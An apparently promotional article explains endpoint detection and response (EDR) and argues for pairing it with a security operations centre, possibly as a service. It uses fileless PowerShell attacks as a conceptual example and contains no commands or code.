Preventive measures alone are not enough to protect notebooks, desktop computers and smartphones. Additional measures are essential in order to detect and combat sophisticated cyber attacks – like a system for endpoint detection and response.
Text: Andreas Heer, Image: iStock,
End devices are often just the start. According to the “Endpoint Security Trends Report” published by the US security provider Absolute Software, around 70 percent of cyber attacks use endpoints as the first point of attack. Endpoints can be notebooks, PCs and smartphones, but also local servers on a company’s network.
The large number of successful attacks demonstrates that purely preventive protection with antivirus software and firewalls is often not enough. This is because the attacks are becoming increasingly sophisticated. Take fileless attacks. This could be a PowerShell script run solely on the RAM of a Windows PC, without leaving any traces in the file system. This makes this kind of attack invisible to signature-based antivirus software. And because the actual payload is often downloaded via a compromised website, it also slips right past the firewall.
This means that end devices require additional protective measures that can detect sophisticated attacks – only then can a company introduce measures for combating the attack. An endpoint detection and response (EDR) system is able to do both. In contrast to signature-based antivirus software, it evaluates the behaviour of the end device and can detect anomalies. EDR also uses machine learning to analyse patterns of behaviour, guaranteeing a highly accurate detection rate. The term “EDR” is relatively new, coined by Gartner analyst Anton Chuvakin in 2013.
EDR is not a standalone solution, however. The alerts triggered by anomalies need to be integrated into a monitoring system such as SIEM (security information and event management) or SOAR (security orchestration, automation and response). This makes it possible to respond with appropriate measures such as automatically blocking the end device’s network access or having the event manually analysed by security specialists. These are tasks that are generally performed by a security operation centre (SOC). An SOC is therefore the logical – and practical – prerequisite for effective EDR.
This requires an EDR solution to be integrated into the existing processes and security systems. Depending on the existing infrastructure, this could be a challenging proposition, for example when it comes to adapting the automated response measures. The available resources of the internal IT security department pose another challenge. Are there sufficient resources available to manage larger attacks?
Completely foregoing EDR is not a viable alternative. Instead, the combination of EDR and SOC as a service offers an economic and, above all, practicable alternative for counteracting cost uncertainty and the lack of skilled workers – without jeopardising the maturity expected of IT security systems today.
More on the topic: